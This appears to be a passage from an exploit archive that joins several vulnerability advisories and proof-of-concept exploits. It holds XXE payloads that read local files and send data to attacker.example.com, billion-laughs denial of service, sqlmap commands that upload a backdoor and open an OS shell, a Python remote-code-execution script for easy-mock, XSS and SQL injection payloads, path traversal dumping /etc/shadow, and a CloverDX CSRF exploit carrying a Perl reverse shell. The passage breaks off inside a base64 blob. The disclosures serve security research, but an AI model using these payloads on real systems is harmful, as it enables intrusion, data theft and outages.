<RedTeam>RedTeam Pentesting</RedTeam>
[...]
------------------------------------------------------------------------
The following example shows how local files can be read from the server
system hosting the MobileTogether Server on a Windows system:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Root [
<!ENTITY redteam SYSTEM "file://c:/windows/win.ini">
]>
<Root>
<RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------
The content of the file is shown below and formatted for better
readability:
------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
<RedTeam>
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
</RedTeam>
[...]
------------------------------------------------------------------------
One interesting target for attackers could be the configuration file for
the MobileTogether Server residing at the following fixed location:
------------------------------------------------------------------------
C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
------------------------------------------------------------------------
For example, if the server supports HTTPS, the absolute path to the
server's certificate and private key is stored in its configuration.
Furthermore, external XML entities can be used to access third-party
websites as well as web services that are only available internally.
Together with an externally hosted XML DTD, response information can be
extracted:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % content SYSTEM "http://internal.example.com">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml"> % dtd; ]>
<Root>
<RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------
The DTD contains the following information:
------------------------------------------------------------------------
<!ENTITY redteam "%start;%content;%end;">
------------------------------------------------------------------------
In the HTTP response, the HTML markup delivered by internal.example.com
is now visible.
A further vulnerability attacks the availability of the service through
XML exponential entity expansion. This is demonstrated with the
following XML document:
------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY redteam0 "RedTeam Pentesting">
<!ENTITY redteam1 "&redteam0; &redteam0;">
<!ENTITY redteam2 "&redteam1; &redteam1;">
<!ENTITY redteam3 "&redteam2; &redteam2;">
<!ENTITY redteam4 "&redteam3; &redteam3;">
<!ENTITY redteam5 "&redteam4; &redteam4;">
<!ENTITY redteam6 "&redteam5; &redteam5;">
<!ENTITY redteam7 "&redteam6; &redteam6;">
<!ENTITY redteam8 "&redteam7; &redteam7;">
<!ENTITY redteam9 "&redteam8; &redteam8;">
<!ENTITY redteam10 "&redteam9; &redteam9;">
<!ENTITY redteam11 "&redteam10; &redteam10;">
<!ENTITY redteam12 "&redteam11; &redteam11;">
<!ENTITY redteam13 "&redteam12; &redteam12;">
<!ENTITY redteam14 "&redteam13; &redteam13;">
<!ENTITY redteam15 "&redteam14; &redteam14;">
<!ENTITY redteam16 "&redteam15; &redteam15;">
<!ENTITY redteam17 "&redteam16; &redteam16;">
<!ENTITY redteam18 "&redteam17; &redteam17;">
<!ENTITY redteam19 "&redteam18; &redteam18;">
<!ENTITY redteam20 "&redteam19; &redteam19;">
]>
<Root>
<RedTeam>&redteam20;</RedTeam>
</Root>
------------------------------------------------------------------------
Sending the shown XML document leads to a huge server-side resource
allocation which ultimately disrupts the availability of the
MobileTogether Server.
Workaround
==========
None known.
Fix
===
According to the vendor, upgrading to version 7.3 SP1 resolves the
vulnerability.
Security Risk
=============
Attackers in possession of an account for a MobileTogether Server with
access to at least one app are able to read files from the server
system, conduct HTTP requests to external and internal systems and can
also deny the availability of the service. Access might also be possible
through default credentials or the anonymous user.
Timeline
========
2021-06-21 Vulnerability identified
2021-06-23 Requested a security contact from vendor
2021-06-25 Security contact established with vendor
2021-07-05 Customer approved disclosure to vendor
2021-07-05 Vendor notified
2021-07-20 Vendor acknowledged vulnerability
2021-07-22 CVE ID requested
2021-07-23 CVE ID assigned
2021-07-28 Vendor released fixed version
2021-08-10 Advisory released
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
# Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection
# Google Dork: intitle: "COVID19 Testing Management System"
# Date: 09/08/2021
# Exploit Author: Ashish Upsham
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
Description:
The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to
SQL injection via the 'searchdata' parameter on the patient-search-report.php page.
==================== 1. SQLi ====================
http://192.168.0.107:80/covid-tms/patient-search-report.php
The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
user has the full ability to run system commands via --os-shell and fully compromise the system
POST parameter 'searchdata' is vulnerable.
step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool.
step 2 : Now copy the post request and save it as test.txt file.
step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell"
----------------------------------------------------------------------
Parameter: searchdata (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search
[19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method
[19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B)
[19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php
[19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'laptop-ashish\ashish'
os-shell>
# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/08/2021
# Exploit Author: LionTree
# Vendor Homepage: https://github.com/easy-mock
# Software Link: https://github.com/easy-mock/easy-mock
# Version: 1.5.0-1.6.0
# Tested on: windows 10(node v8.17.0)
import requests
import json
import random
import string
target = 'http://127.0.0.1:7300'
username = ''.join(random.sample(string.ascii_letters + string.digits, 8))
password = ''.join(random.sample(string.ascii_letters + string.digits, 8))
print(username)
print(password)
# can't see the result of command
cmd = 'calc.exe'
# register
url = target + "/api/u/register"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# login
url = target + "/api/u/login"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text
login = json.loads(req)
token = login['data']['token']
# create project
url = target + "/api/project/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# get project_id
url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
req = requests.get(url, headers=headers, cookies=cookies).text
projects = json.loads(req)
project_id = projects['data'][0]['_id']
# create mock
url = target + "/api/mock/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "poc", "method": "get", "mode": "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n }\n })();\n }\n}", "project_id": project_id, "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# preview mock
url = target + "/mock/{}/{}/{}".format(project_id,username,username)
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
requests.get(url, headers=headers, cookies=cookies)
# Exploit Title: Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 12/08/2021
# Exploit Author: Ömer Hasan Durmuş
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: v1.0
# Category: Webapps
# Tested on: Linux/Windows
Step 1 : Login to admin account in http://TARGET/ghpolice/login.php default credentials. (1111:admin123)
Step 2 : Then click on the "Add Staff"
Step 3 : Input "<img src=x onerror=alert(1)>" in the field "Firstname" or "Othernames"
Step 4 : Click on "Save and Continue"
Step 5 : Update page.
# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
# Date: 29.07.2021
# Exploit Author: securityforeveryone.com
# Vendor Homepage: https://care2x.org
# Software Link: https://sourceforge.net/projects/care2002/
# Version: =< 2.7 Alpha
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com
DESCRIPTION
In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters.
The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php".
Example:
/nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern=
if an attacker exploits this vulnerability, attacker may access private data in the database system.
EXPLOITATION
# GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1
# Host: Target
Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs
Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl
Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg
# Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration
# Date: 03.05.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.eforcesoftware.com
IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration
Vendor: IntelliChoice, Inc.
Product web page: https://www.eforcesoftware.com
Affected version: 2.5.9.6
2.5.9.5
2.5.9.3
2.5.9.2
2.5.9.1
2.5.8.0
2.5.7.20
2.5.7.18
2.5.6.18
2.5.4.6
2.5.3.11
Summary: IntelliChoice is a United States software company that was
founded in 2003, and offers a software title called eFORCE Software
Suite. eFORCE Software Suite is law enforcement software, and includes
features such as case management, court management, crime scene management,
criminal database, dispatching, evidence management, field reporting,
scheduling, court management integration, certification management,
and incident mapping. With regards to system requirements, eFORCE
Software Suite is available as SaaS, Windows, iPhone, and iPad software.
Desc: The weakness is caused due to the login script and how it verifies
provided credentials. Attacker can use this weakness to enumerate valid
users on the affected application via 'ctl00$MainContent$UserName' POST
parameter.
Tested on: Microsoft-IIS/10.0
Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5658
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php
03.05.2021
--
Request/response for existent username:
---------------------------------------
POST /eFORCECommand/Account/Login.aspx HTTP/1.1
__LASTFOCUS:
__EVENTTARGET:
__EVENTARGUMENT:
__VIEWSTATE: Xxx
__VIEWSTATEGENERATOR: 4A5A1A0F
__EVENTVALIDATION: Xxx
ctl00$MainContent$UserName: eforce
ctl00$MainContent$Password: 123456
ctl00$MainContent$btnLogin.x: 20
ctl00$MainContent$btnLogin.y: 7
Response:
Invalid password entered for username eforce.
Request/response for non-existent username:
-------------------------------------------
POST /eFORCECommand/Account/Login.aspx HTTP/1.1
__LASTFOCUS:
__EVENTTARGET:
__EVENTARGUMENT:
__VIEWSTATE: Xxx
__VIEWSTATEGENERATOR: 4A5A1A0F
__EVENTVALIDATION: Xxx
ctl00$MainContent$UserName: testingus
ctl00$MainContent$Password: 123456
ctl00$MainContent$btnLogin.x: 20
ctl00$MainContent$btnLogin.y: 7
Response:
Unable to login: User name testingus is not registered.
# Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.ljkj2012.com
Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
Vendor: Longjing Technology
Product web page: http://www.ljkj2012.com
Affected version: 1.21
Summary: Battery Energy Management System.
Desc: The application suffers from an unauthenticated arbitrary
file download vulnerability. Input passed through the fileName
parameter through downloads endpoint is not properly verified
before being used to download files. This can be exploited to
disclose the contents of arbitrary and sensitive files through
directory traversal attacks.
Tested on: nginx/1.19.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5657
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
05.07.2021
--
$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow
root:*:18477:0:99999:7:::
daemon:*:18477:0:99999:7:::
bin:*:18477:0:99999:7:::
sys:*:18477:0:99999:7:::
sync:*:18477:0:99999:7:::
games:*:18477:0:99999:7:::
man:*:18477:0:99999:7:::
lp:*:18477:0:99999:7:::
mail:*:18477:0:99999:7:::
news:*:18477:0:99999:7:::
uucp:*:18477:0:99999:7:::
proxy:*:18477:0:99999:7:::
www-data:*:18477:0:99999:7:::
backup:*:18477:0:99999:7:::
list:*:18477:0:99999:7:::
irc:*:18477:0:99999:7:::
gnats:*:18477:0:99999:7:::
nobody:*:18477:0:99999:7:::
_apt:*:18477:0:99999:7:::
$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 14.04.2021
# Exploit Author: niebardzo
# Vendor Homepage: https://www.cloverdx.com/
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
# CVE : CVE-2021-29995
# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
# Reference for cracking ViewState:
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
import http.server
import socketserver
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
import subprocess
import sys
import json
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
# replace with your own target
target = "http://localhost:8080"
query_comp = parse_qs(urlparse(self.path).query)
if "target" in query_comp:
target = query_comp["target"][0]
req = requests.get(target+"/clover/gui/login.jsf")
if req.status_code != 200:
sys.exit(-1)
# parse the reponse retrieve the ViewState
soup = BeautifulSoup(req.text, "html.parser")
cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
# Use the ViewstateCracker.java to get new Viewstate.
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
new_view_state = new_view_state.decode("utf-8").strip()
print(new_view_state)
if new_view_state == "6927638971750518694:6717304323717288036":
html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
else:
html = ("<!DOCTYPE html><html><head>"
+ "<script>"
+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
+ "function exec4(){document.getElementById('form4').submit();}"
+ "</script>"
+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
+ "<script>history.pushState('','/');</script>"
+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='headerForm:manualListenerItem' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='headerForm:manualListenerItem' name='headerForm:manualListenerItem'>"
+ "<input type='hidden' value='headerForm' name='headerForm'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.source'>"
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='manualListeneForm:taskFormFragment' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
+ "<input type='hidden' value='on' name='manualListeneForm:saveRunRecord_input'>"
+ "<input type='hidden' value='true' name='manualListeneForm:manualVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm:execute_button'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propName'>"
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propValue'>"
+ "<input type='hidden' value='' name='manualListeneForm:taskType_focus'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
#
# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
#
+ "<input type='hidden' value='perl -e 'use Socket;$i="192.168.65.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'' name='manualListeneForm:shellEditor'>"
+ "<input type='hidden' value='' name='manualListeneForm:workingDirectory'>"
+ "<input type='hidden' value='10000' name='manualListeneForm:timeout'>"
+ "<input type='hidden' value='true' name='manualListeneForm:scriptVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "</body></html>")
self.wfile.write(bytes(html,"utf-8"))
base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAg